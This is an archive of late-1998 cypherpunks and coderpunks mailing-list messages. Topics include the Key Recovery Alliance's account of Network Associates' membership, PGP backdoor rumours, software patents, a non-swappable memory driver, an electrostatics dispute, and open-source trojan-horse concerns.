
Date: Sun, 22 Nov 1998 05:27:31 -0800
To: pgp-users@joshua.rivertown.net, cryptography@c2.net
From: Dave Del Torto <ddt@lsd.com>
Subject: KRA on ADK vs KR, NAI membership
Cc: coderpunks@toad.com, ukcrypto@maillist.ox.ac.uk

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Summary:

(1) The Key Recovery Alliance will analyze the viability of PGP's ADK
    technology as an alternative to escrowing of keying material and intends
    to publish its position.

(2) Network Associates IS a member of the KRA as of July 2, 1998. Note that
    date is ~6 months after NAI represented itself as having withdrawn.

(3) Corporate contacts for KRA member-companies are not public information.
    I have also inquired about who the KRA contact person is at NAI.

   dave

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0
Comment: Get interested in computers -- they're interested in YOU!

iQA/AwUBNlgRApBN/qMowCmvEQLm7wCgx+7sBVgBQsXisQLJswx3w7a16Q0Anii3
XOzJzZxEMqd9YnMlz93U+iXX
=eHxw
-----END PGP SIGNATURE-----


................................. cut here .................................
My Inquiry to the KRA:

To: info@kra.org
Subject: request for information

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

I have some questions about the KRA.

1. In your FAQ <http://www.kra.org/FAQS1209.html>, you state that one of the
organization's goals is to:

  "Serve as a focal point for industry efforts to develop commercially
   acceptable solutions for recovery of encrypted information"

This seems to allow that there may be valid encrypted _data_ recovery
methods other than _key_ recovery using the KRA's "common key recovery
block" (still under discussion). However, I'm not aware of the KRA's public
position on the recovery of plaintext using cryptographically sound and
ethically responsible alternatives to the escrowing of keys in
organizational situations, e.g. PGP's Additional Decryption Key (ADK)
mechanism. What is the KRA's public position on PGP's ADK?

2. A public debate has recently arisen because the KRA website's member
roster indicates that Network Associates (NAI) is a member of the KRA. NAI
representatives, however, have publicly contraindicated this. Can you
clarify NAI's membership status in the KRA, specifically:

A. On what date (if ever) did NAI apply for membership in the KRA?
B. Is the KRA in possession of any evidence (letter, etc) to show that NAI
    was or is a member of the KRA?

C. If NAI was a member of the KRA at any time, on what date did a
    corporate officer of NAI formally withdraw NAI from the KRA, if ever?
D. Regarding KRA membership policy, if a company is not a member itself
    but acquires another company that is a KRA member, but, does
    this acquisition automatically confer membership status on the parent
    company, or is a formal request to "expand" the company's membership
    necessary?
E. If NAI was not a member of the KRA at the time of its Trusted
    Information Systems (TIS) acquisition, did the KRA receive a request
    from any NAI representative to expand TIS's membership to all of NAI?

3. KRA member companies are listed with their web URLs, but no individual
contact name/phone/email is provided for any of them. Can you supply a
complete listing of the designated contacts (corporate representatives) at
each of the KRA member organizations, should one want to discuss with them
their respective companies' KR positions or proposals? For example, if, in
fact, the KRA website is correct to list NAI as a member, then who is NAI's
official KRA representative?

Thank you in advance for your prompt clarification.

   dave

____________________________________________________________________________
Dave Del Torto        +1.415.334.5533          CSO & VP Security Consulting
                       <mailto:ddt@lsd.com>         Level Seven Digital Labs
PGP Key:  <http://pgp.ai.mit.edu:11371/pks/lookup?op=getsearch=0x28C029AF>
Fingerprint: 9b29 031d 70de f566 e076 b108 904d fea3 28c0 29af / Size: 4096


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0

iQA/AwUBNlUMapBN/qMowCmvEQKt8wCg0i6ZZj1a6aL/TrzM/jqv4wKBEnoAoK4e
xkwtQCiBJDHuBUWFRzCRBA/K
=fg+B
-----END PGP SIGNATURE-----

................................. cut here .................................
The KRA's prompt reply (signed by me to indicate what I received):


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Date: Fri, 20 Nov 1998 06:31:50 -0800
To: Dave Del Torto <ddt@lsd.com>
From: Michael LoBue <LoBue@kra.org>
Subject: Re: request for information
Cc: Majdalany@kra.org, Bobbie@kra.org

Mr. Del Torto,

Thank you for your inquiry about a KRA member company. I am member of the
Alliance's secretariat staff addressing their business and administrative
needs. This puts me in a position to answer some of your questions directly.

Others I will pass along to appropriate Alliance member representatives for
response.

About the KRA's public position on PGP's ADK, obviously it was not
adequately addressed for your needs in the Alliance's existing materials. I
will ask a more appropriate and knowledgeable spokesperson to respond to
your questions and concerns.

Concerning Network Associates membership in the KRA, in response to your
question I have verified that our files contain an executed Membership
Agreement for Network Associates (dated July 2, 1998), as well as a properly
completed Application for Membership of that same date. 
As an aside, the KRA has retained our firm to manage their business and
administrative affairs. Our business is solely the management of industry
associations. Thus, we have no conflict of interest as our clients are the
'associations' themselves and not any of the individual member companies.
For the management of our client associations (currently 4) we employ
certain practice standards. One important practice area is the impartial
recognition of membership. Simply put, we exercise no discretionary judgment
about whether a company is a member or not. If a company completes the
required steps to become a member (execute an agreement, complete an
application and pay the appropriate dues) they become a member. In other
words, membership is binary...complete all the steps --> become a member;
omit any of these steps --> NOT a member.

Ever since the the Alliance was formally constituted as a California
nonprofit corporation (October 1997), rigorous application processes have
been in place. It is true that a number of companies, including NAI I
believe, were attending meetings under the name of the KRA during much of
1997. However, until the Alliance was formally constituted, involving
membership agreements, applications and payment of dues, it's not entirely
accurate to characterize those companies participating in 1997 as 'members'
of the Alliance. Indeed, some of this current 'public debate' about NAI's
relationship with the KRA goes back to their public statement that they
'withdrew' from the organization. The fact of the matter is that they simply
did not choose to become an actual member at the time the organization was
formally constituted. When it was reported that they withdrew, there was in
fact no entity from which to withdraw. 

Regarding the listing of individual representatives from member companies,
it is the Alliance's policy not to do this. For whatever it's worth, this is
a standard practice of industry associations. I am passing your message
along to the designated NAI representative and inviting him to respond. 

At the risk of stating the obvious, it is not uncommon for companies in any
industry, especially hi-tech, to have multiple opinions within their
management teams. And, to have these opinions expressed in public forums. It
has been my experience that it is dangerous to infer corporate and product
strategies from a companies membership in industry groups. Companies join
industry associations for all manner of reasons, not all of which they share
with the market. I'm not suggesting any thing other than the fact that our
industry makes for extremely "complex business" and there's no reason to
believe that this complexity of actions, strategies and motivations isn't
going to appear in a company's involvement in industry associations. 

Sorry for the length of this reply. However, it's clear that there are a
great many concerns behind your questions and I've tried to reach those
concerns. I hope this response has been useful to you. 
Regards,
Michael LoBue
KRA Secretariat Staff


  --end KRA response--


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0

iQA/AwUBNlWtuJBN/qMowCmvEQI6WACgv0CZt3KmzptfQxO/2FJ2aqAA/v8An1C6
+q4Uh8H0LuwMKpou5cVS14v6
=ssZt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vortexia" <vortexia@doxx.net>
Date: Sun, 22 Nov 1998 21:36:29 +0800
To: <cypherpunks@Algebra.COM>
Subject: Question about general patents
Message-ID: <003401be161a$2b4a4140$c9e431ce@vort.nis.za>
MIME-Version: 1.0
Content-Type: text/plain



I was wondering... what is the current law in the United States about
patenting of software programs, and does anyone know where I can find out if
there are any standard international laws about the patenting of software.

I have products that I and the rest of my company have designed that we need
patented, unfortunatly the South African patent act reads like this:

(Republic of South Africa, Patents act no. 57 of 1978)
Section 2.2.1:

Anything which consists of a discovery; a scientific theory; a mathematical
concept; a literary, dramatic, musical or artistic work or any other
aesthetic creation, a scheme, rule or method for performing a mental act,
playing a game or doing business, a program for a computer; or the
presentation of information, is not regarded as an invention for the
purposes of the Patents Act.


If there is any other way to protect my software and my designs
internationally, or under any international treaties etc, and anyone knows
of such a way, please drop me an email, it would be much appreciated.

Cheers

Andrew Alston





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Adler" <jadler@soundcode.com>
Date: Tue, 24 Nov 1998 07:56:21 +0800
To: <coderpunks@toad.com>
Subject: Re: Securing data in memory (was "Locking physical memory (RAM) under Windows")
Message-ID: <002801be0ae3$cc8c3ff0$0a000080@choochoo>
MIME-Version: 1.0
Content-Type: text/plain



SCNSM 1.0 Beta, a non-swappable memory allocator for Windows 3.x/95/98, is
available and can be downloaded from

http://soundcode.com/content/download/products/scnsm/default.htm (docs)
http://soundcode.com/content/download/products/scnsm/scnsm10b.zip (source)

The SCNSM driver supports allocation of non-swappable memory on Windows
3.x/95/98. The principal design goal of SCNSM is to provide memory that will
not be swapped to disk, under any circumstances. Typically, security
applications require such memory to store private keys, passwords, and
sensitive intermediate results of cryptographic calculations.

SCNSM uses the same technique as allocating DMA buffers for hardware device
transfers.  The idea being that Windows doesn't swap DMA buffers and
therefore won't swap this buffer either.

The SCNSM source-code is copyrighted freeware.  The intent here is to end
the perennial nuisance of having sensitive security data swapped to disk
which undermines the public's confidence in commercial security products.
Please send any questions or bugs to me or support@soundcode.com.

Jim

================
Jim Adler
Soundcode, Inc.
www.soundcode.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: egnarr@rbc.edu
Date: Mon, 23 Nov 1998 01:55:52 +0800
To: <cypherpunks@cyberpass.net>
Subject: Looking for that Perfect Christmas Gift?
Message-ID: <199811221718.JAA26196@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Merry Christmas & Happy Holidays From the Staff at 
Mall-Cartay.com

We here at MALL CARTAY  have strived to bring to you the best 
collection of unique gift expressions. We hope that you take a 
few moments to browse through our catalogs, we are sure you will 
find that special gift you've been looking for. Just copy & paste 
this address into your browser window:
http://www.mall-cartay.com

Our catalogs have been optimized for ease of use and quick 
download to your browser window.

YOU SHOULD LOOK NOW BECAUSE THESE INCREDIBLE GIFTS WILL SELL OUT 
SOON. ALL ORDERS ARE ON A FIRST COME FIRST SOLD BASIS

Come inside & see why Mall-CARTAY is becoming the Internet's 
Premier Shopping Mecca. Scroll down through this amazing 
collection of beautiful soft teddy bears from the Bearington 
Collection or dream over Granlund's Sweet Temptations
(Chocolates & Truffles) & Marry Madeline's chocolate mud pies.  
These items are a sure bet for those of us with a perpetual sweet 
tooth.

Our unique Christmas Wreath Line are hand crafted from the 
highest quality noble fir from the great pacific northwest.  The 
high elevation blue noble fir tree is the longest lasting and 
most fragrant of all the conifers and are what only the highest 
quality wreaths are made from.

All ordered items have a guaranteed delivery date via direct 
shipment to your door no later than December 15, 1998.

We would like to thank you in advance for looking through the 
fine Christmas Collections that Mall-CARTAY.Com has assembled for 
you this Holiday Season.

We are sure you will find our experience and dedication to 
quality product and service a most favorable experience.  We are 
looking forward to being your first stop when looking for that 
special gift on any occasion.

Again thank you and have a joyous and happy holiday season.

The staff at Mall-Cartay.com
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon dyer <landon@best.com>
Date: Mon, 23 Nov 1998 01:58:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Hey, what does he know?
In-Reply-To: <000101be1631$ca7052c0$7fa795cd@big-boy.teletactics.com>
Message-ID: <4.1.19981122084708.00a283f0@shell9.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:03 AM 11/22/98, you wrote:
>http://www.zdnet.com/zdnn/stories/news/0,4586,2168153,00.html

  well, no matter wh'appens, microsoft is going to come out of
this smelling like a rose


>"By the time the government's case is done, who knows how the industry will 
>look?" he said. "And furthermore, it could open the door to more government 
>regulation of the technology industry overall."

  putting on my favorite cryptoparanoia hat, over the next five years:


   o	MS gets what it wants -- more regulation, forcing it to stop
	selling OSs with computers.  instead, if you by an MS OS, you'll
	rent it annually.  ["please, janet, don't throw me in that briar
	patch!"]

	to do this, MS has to get intel to put crypto hooks in the
	wintel architecture; microcode burned-in at the chip fab that
	prevents MS operating systems from running on other h/w


   o	intel gets what it wants: no clones.  if you want to run linux
	on your AMD K-10, feel free.  if AMD wants to get in the game,
	they'll have to visit ft. meade


   o	the government gets what it wants, because the crypto hooks
	in the wintel architecture allow KRAP to proceed without any
	pesky legislation -- just behind-doors agreements with MS and
	intel

	a more cynical person than me might note that sun's "java OS"
	that would run anywhere would be a *lot* more difficult to
	suborn at the chip level


  i haven't figured out how the communications infrastructure is going
to be noodled.  maybe it doesn't have to be.  expect ipsec to die a
long, slow death -- a delaying tactic, the best kind for the feds,
because it prevents any sucessors from getting up a head of steam.  [i
don't know beans about the current status of ipsec]


  long about 2020 or so it'll be a federal offense to own an EPROM
burner, a processor with re-flashed microcode, an unlicensed logic
analyzer, or a copy of linux... :-)


  [stay tuned for a short story about the freedom fighters of 2025,
   hacking secure communications on copies of the last architectures
   known not to be compromised ("daddy, what's a PDP-10?"), running ITS
   on souped-up gigahertz pocket portables, getting packets through on
   covert channels involving the coat-tails of the (now ubiquitous) KRAP
   session key negotiations...]


-landon [re-lurking]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 23 Nov 1998 01:57:50 +0800
To: vortexia@doxx.net
Subject: Re: Question about general patents
In-Reply-To: <003401be161a$2b4a4140$c9e431ce@vort.nis.za>
Message-ID: <199811221728.JAA09524@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Vortexia writes:
> 
> I was wondering... what is the current law in the United States about
> patenting of software programs, and does anyone know where I can find out if
> there are any standard international laws about the patenting of software.

You can't patent a computer program under US patent law either.
You can patent an algorithim or a method however.

-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 23 Nov 1998 02:29:51 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Oh, a warning about playing with glass & charge....
In-Reply-To: <199811212138.PAA16195@einstein.ssz.com>
Message-ID: <v03130301b27e019d596b@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:38 PM -0800 11/21/98, Jim Choate wrote:
>If you do decide to play with charges stored on glass plates wear eye
>protection because every once in a while the mechanical stress is more than
>the glass can take and it will shatter.
>

And when you do your "...and then take away one of the copper plates"
experiment, you'll find that force is needed. Force times distance is
energy. The energy to pull one of the plates away equals the 0.5CV^2 energy
no longer stored in the capacitor.

The energy stored is not stored either on the plate or on the insulator. It
is in the electric field.

A free-standing single conductor can of course store a charge. And can of
course have an electric field.

Frankly, Jim, you no doubt have a lot of practical experience building
Tesla coils, Van de Graf generators, whatever.

But you also have what can only be described as "crankish" notions about
how electromagnetism works (pace last week's discussion of charges inside
conductors, a la Gauss), about prime numbers, and so on.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 23 Nov 1998 03:46:43 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Oh, a warning about playing with glass & charge.... (fwd)
Message-ID: <199811221916.NAA18764@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 22 Nov 1998 10:05:41 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: Oh, a warning about playing with glass & charge....

> And when you do your "...and then take away one of the copper plates"
> experiment, you'll find that force is needed. Force times distance is
> energy. The energy to pull one of the plates away equals the 0.5CV^2 energy
> no longer stored in the capacitor.

This is true ONLY if the dielectric doesn't touch either plate and is simply
used to increase the storage capability (via Gauss' Law) of the capacitor
over an air gap type of the same physical structure. The reason you have
this force is the induced charge on the surface of the dielectric and the
electrostatic attraction this causes with the charge on the plate. If the
plate ACTUALY TOUCHES there is NO INDUCED CHARGE via Gauss's Law, it's a
REAL charge stored on the surface of the insulating dielectric and the plate
remains NEUTRALY charged.

Why is there no induced charged? Because as you place charge on the
conducting plate it induces a charge via Gauss' Law on the dielctric. Since
the metal has outer orbital electrons available (which an insulator doesn't)
the charge in the plate gets transported to the surface of the insulator and
bonds there (remember unlike charges attract) with the induced charge.

Why does the charge storage increase because of the dielectric? The
electrical moment of the atoms is greater than that of the air. This is
another reason the charge once deposited on the dielectric surface will
stay there when the plate is removed.

If you go back and look at the examples in your physics books that your
basing your position on you'll find that in EVERY case there is an air gap
between the plates and the dielectric. Remove the air gap and the behaviour
of the charge and hence it's explanation changes accordingly.

> The energy stored is not stored either on the plate or on the insulator. It
> is in the electric field.

Q: Where does the electric field come from Tim?

A: The charges (ie electrons and protons) that are sitting on the surface of
   the dielectric (where the di- comes from). The electric field strength is
   a measure of the wavelength of the photons those two contrary sets of
   particles are bouncing back and forth between themselves.

Q: Explain why the charge sitting on the surface of that dielectric will
   stay on the metal plate when the metal plate is removed. The metal plate
   is a conductor so as it is removed it effectively carries the charge of
   the part of the dielectric that it still retains contact with. Why would
   that e- choose to move TOWARD a ne- charge when it's sitting there with
   an opposite charge already in a minimum energy configuration?

A: It won't. To do so violates the minimal energy requirements of the
   system as well as the standard behaviour of charges (ie like repel,
   opposite attract).

Another experiment....

Try removing the metal foil when there is a charge and when there isn't.

You won't find an appreciable difference.

As to the energy required to remove the foil, yes force times distance is
energy and it's the energy requisite to overcome the inertia of the metal
foil. There is also a small additional force caused by Gauss' Law because the
the distance between the e- (for example) stored on the dielectric and the
metal plate will form a 'virtual' charge on the surface of the plate. However,
since the plate itself is neutral (by definition) there will be a contrary
charge on the opposite side. Hence, you won't loose a single coulomb of charge
to the metal plate. You can check this by using either an electronic charge
meter (1-800-OMEGA if you're interested) or you  can use a gold leaf
electrometer. If the charge varies as Tim claims then the angle between the
leaves should change (ie get smaller). It won't.

As to the force, the maximal force will occur when the plate is removed as a
single piece perpendicular to the surface of the dielectric. If you roll or
peel it off it will for all intents and purposes come free effortlessy
because you won't have to fight the electrostatic force.

                --------------------------------------  < Cu +
              ------------------------------------------
                --------------------------------------  < Cu -
              ------------------------------------------
                --------------------------------------  < Cu +
              ------------------------------------------
                --------------------------------------  < Cu -

NOTE: there is NO air gap between the glass and the Cu sheeting. I use
      normal old cinter blocks to press them together as tightly as I
      can.

Another experinment:

Build the stack as shown above and remove each later one at at time with
and without charge. Note the behaviour of the metal plate. It will tend to
go with the glass plate that is being removed. Because of induced charges
via Gauss' Law the foil will tend to go with the glass plate as it's
removed.

            ---------------------------------------------
             -------------------------------------------  Cu +
            ---------------------------------------------

As the top plate is removed the air gap will force a virtual charge to build
up on the surface of the foil. As a consequence an opposite and equal charge
will build up on the other side of the foil and it will be + and in
opposition to the + charge already sitting on the bottem glass plate. The
induced charge on the top of the Cu will be - and will be attracted to the +
charge on the bottem of the top plate.

This of course assumes you're using very thin foil. If it's very thick at
all you won't see this because of gravity. I tend to use very heavy foil so
that I don't get shocks from these various induced fields when I'm handling
the plates. Be sure to use heavy rubber gloves. Rubbermaid kitchen gloves
intended for industrial washing are sufficient unless you're going to use a
high voltage and charge.

Anybody who wants to understand the theory (despite Tim's claims to the
contrary) is welcome to check out:

Physics
Jay Orear
ISBN 0-02-389460-1
Chpt. 16, Electrostatics
pp. 308 - 338
in particular,
pp. 327, 16-6 Dielectrics


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: holist <holist@mail.matav.hu>
Date: Mon, 23 Nov 1998 06:27:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811222154.NAA25646@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm sorry if this is gnawing at old bones for you, but I recently heard from
a rather paranoid, anonymous source here in Hungay that PGP was compromised,
Zimmermann sold out to the Feds, all versions except possibly early DOS
versions of PGP have back doors in them. 
He is also claiming that the CIA have already provided the backdoor-key to
PGP 5.0 to the Hungarian Secret Services. Is he being too paranoid, or what?

The reason I am asking cypherpunks, which I realise is not really a list
dedicated to PGP, about them, is that their credentials to my mind would be
sufficient to discredit. I have heard this rumour in sufficiently bogus
intellectual contexts before (Cyberconf8, if that rings a bell to anyone -
wouldn't blame you if it didn't) where it seemed blatantly obvious that it
was entirely unfounded, as the people who were spreading it could not
recognise code if they saw it, and seemed only an attempt to appear to be in
the know. This source, however, seems different.

Can I have some reassurance, please? And could you possibly suggest how
someone unable to check the code themselves could go about authenticating a
version of PGP? It is fated to become a rather important issue here soon.

thank you

holist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 23 Nov 1998 09:06:46 +0800
To: Lucky Green <bill.stewart@pobox.com>
Subject: Re: Free Email as Anonymous Remailer Re: NPR is at it again...
In-Reply-To: <3.0.5.32.19981114002632.007caa30@idiom.com>
Message-ID: <v04003a02b27e44f94fab@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>On Sat, 14 Nov 1998, Bill Stewart wrote:
>
>> At 11:47 PM 11/11/98 +0100, Lucky Green wrote:
>> >On Wed, 11 Nov 1998, Bill Stewart wrote:
>> >> An interesting project would be a free low-volume anonymizer cgi for
>>Apache,
>> >> given the large number of current users and the much larger number
>> >> of people who will run web servers once they have cable modems.
>> >How do you do chaining with a cgi?
>>
>> Looks easy enough to do, if a bit ugly, where "ugly" is somewhat
>>equivalent to
>> "build yet another local proxy widget to hide the gory details",
>> though it's not really much uglier than doing a good anonymizer,
>> and getting details like cookies and Java/script right are harder.
>>

Could something like Hot Lava's proxy http://www.hotlava.com/software/ be a
good starting point?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon dyer <landon@best.com>
Date: Mon, 23 Nov 1998 07:46:56 +0800
To: riburr@shentel.net
Subject: Re: Hey, what does he know?
In-Reply-To: <199811222134.WAA14380@replay.com>
Message-ID: <4.1.19981122145914.00ad4a30@shell9.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:28 PM 11/22/98 -0500, you wrote:
>
>
>
>Anonymous wrote:
>
>> At 09:23 AM 11/22/98 -0800, landon dyer wrote:
>>
>> >>  long about 2020 or so it'll be a federal offense to own an EPROM
>> >burner, a processor with re-flashed microcode, an unlicensed logic
>> >analyzer, or a copy of linux... :-)
>>
>> A CPLD, a compiler, a computer-controlled radio, a soldering iron... :-(
>
>Uncrippled DNA ~x~

  oh, yes.  "for the children..."  now it all makes sense  :-)


-landon

                          ''^``
                         ('O-O')
+--------------------oooO--(_)--Oooo---- -- - -  -
| landon dyer         ooo0               Some days it's just not worth
| landon@best.com     ( ( )   Oooo.       gnawing through the straps...
+----------------------\ (----( ) )------ --- -- - -  -
                        \_)    ) /
                              (_/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 23 Nov 1998 07:42:51 +0800
To: holist <holist@mail.matav.hu>
Subject: Re:
In-Reply-To: <199811222154.NAA25646@toad.com>
Message-ID: <199811222216.RAA002.10@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199811222154.NAA25646@toad.com>, on 11/22/98 
   at 01:54 PM, holist <holist@mail.matav.hu> said:

>I'm sorry if this is gnawing at old bones for you, but I recently heard
>from a rather paranoid, anonymous source here in Hungay that PGP was
>compromised, Zimmermann sold out to the Feds, all versions except
>possibly early DOS versions of PGP have back doors in them. 
>He is also claiming that the CIA have already provided the backdoor-key
>to PGP 5.0 to the Hungarian Secret Services. Is he being too paranoid, or
>what?

>The reason I am asking cypherpunks, which I realise is not really a list
>dedicated to PGP, about them, is that their credentials to my mind would
>be sufficient to discredit. I have heard this rumour in sufficiently
>bogus intellectual contexts before (Cyberconf8, if that rings a bell to
>anyone -
>wouldn't blame you if it didn't) where it seemed blatantly obvious that
>it was entirely unfounded, as the people who were spreading it could not
>recognise code if they saw it, and seemed only an attempt to appear to be
>in the know. This source, however, seems different.

>Can I have some reassurance, please? And could you possibly suggest how
>someone unable to check the code themselves could go about authenticating
>a version of PGP? It is fated to become a rather important issue here
>soon.

This is FUD.

Goto: http://www.pgpi.com

Download the source code to the version of PGP you want to run and compile it yourself. You are free to examine the code and insure that there are no "backdoors" in it.

This is the advantage of PGP over the various S/MIME products on the market. PGP source code is available for peer review, Netscape, Microsoft, (add your S/MIME vendor here) is not.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Mon, 23 Nov 1998 06:54:00 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Hey, what does he know?
In-Reply-To: <199811222134.WAA14380@replay.com>
Message-ID: <36589027.723BEA18@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Anonymous wrote:

> At 09:23 AM 11/22/98 -0800, landon dyer wrote:
>
> >>  long about 2020 or so it'll be a federal offense to own an EPROM
> >burner, a processor with re-flashed microcode, an unlicensed logic
> >analyzer, or a copy of linux... :-)
>
> A CPLD, a compiler, a computer-controlled radio, a soldering iron... :-(

Uncrippled DNA ~x~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 23 Nov 1998 11:57:42 +0800
To: users@einstein.ssz.com (SSZ User Mail List)
Subject: Is Open Source safe? [Linux Weekly News]
Message-ID: <199811230327.VAA20072@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://lwn.net/1998/1119/Trojan.html

>                                THE TROJAN HORSE
>                                        
>                                        
>     Bruce Perens <bruce@hams.com>
>     
>    
>    There's a problem that could very badly effect the public perception
>    of Linux and Open Source. I want people to think about this, and
>    hopefully "head it off at the pass" before it happens.
>    
>    Perhaps it's already on your system today: a trojan-horse program. It
>    might be a game, or more likely a system utility. It's author uploaded
>    it to an FTP archive, where it was then picked up by your favorite
>    Linux distribution, who wrote it onto the CD-ROM that you bought. It
>    works just fine, but hidden away in the program is a special feature:
>    a secret back-door past your system's security.
>    
>    Perhaps the author of this attack is tired of hearing about what great
>    hackers we are, and wants to take us down a notch. He's patient - he
>    will wait until his program is distributed to tens of thousands of
>    Linux systems before he says a word. But say is what he'll do - he's
>    not really interested in breaking into your system. What he wants is
>    the publicity, bad publicity for us, and lots of it. We've left the
>    gates open for this trojan horse. Let's talk about how to close them,
>    and hope we have enough time to solve this problem before our
>    reputation is hurt.

[mnoga tekct oodalyaty]


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 23 Nov 1998 06:05:56 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Hey, what does he know?
Message-ID: <199811222134.WAA14380@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:23 AM 11/22/98 -0800, landon dyer wrote:

>>  long about 2020 or so it'll be a federal offense to own an EPROM
>burner, a processor with re-flashed microcode, an unlicensed logic
>analyzer, or a copy of linux... :-)

A CPLD, a compiler, a computer-controlled radio, a soldering iron... :-(











  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 23 Nov 1998 12:47:21 +0800
To: cypherpunks@cyberpass.net
Subject: Wired: AOL selling E-Stamps
Message-ID: <3.0.5.32.19981122223921.00c0f550@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.wired.com/news/news/business/story/16374.html

				AOL's E-Stamp of Approval
                        Wired News Report 

                        12:20 p.m.  19.Nov.98.PST
                        Is it time for stamp collectors to go online? 

                        America Online (AOL) and E-Stamp, an online
                        postage firm, said on Thursday they will make
                        Internet postage service available to customers of
                        AOL, CompuServe, AOL.COM, and AOL's Digital
                        City. 

                        AOL and E-Stamp's service will allow customers to
                        securely purchase postage online and print
                        "digital stamps" on envelopes, labels, or
                        documents using their personal computer and a
                        standard printer. Customers must first install
                        E-Stamp software. They can then buy postage by
                        credit card, electronic fund transfer, or check. 

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vlad Stesin <rmiles@Generation.NET>
Date: Mon, 23 Nov 1998 13:08:13 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <199811230327.VAA20072@einstein.ssz.com>
Message-ID: <Pine.SOL.3.96.981122232742.12779A-100000@sparkle>
MIME-Version: 1.0
Content-Type: text/plain



I don't quite understand the logic behind this. The fact that the
program's source is available is itself a proof that there are no
backdoors. Anyone can read the source code and make sure it's OK.

However, this argument does hold against non-OSS. It can even be used to
promote Linux (and other free open-source operating systems), since
someone could distribute some win32 trojans on download.com, tucows.com
and others.

Regards,
--
Vlad Stesin 
vstesin@cs.mcgill.ca

On Sun, 22 Nov 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > X-within-URL: http://lwn.net/1998/1119/Trojan.html
> 
> >                                THE TROJAN HORSE
> >                                        
> >                                        
> >     Bruce Perens <bruce@hams.com>
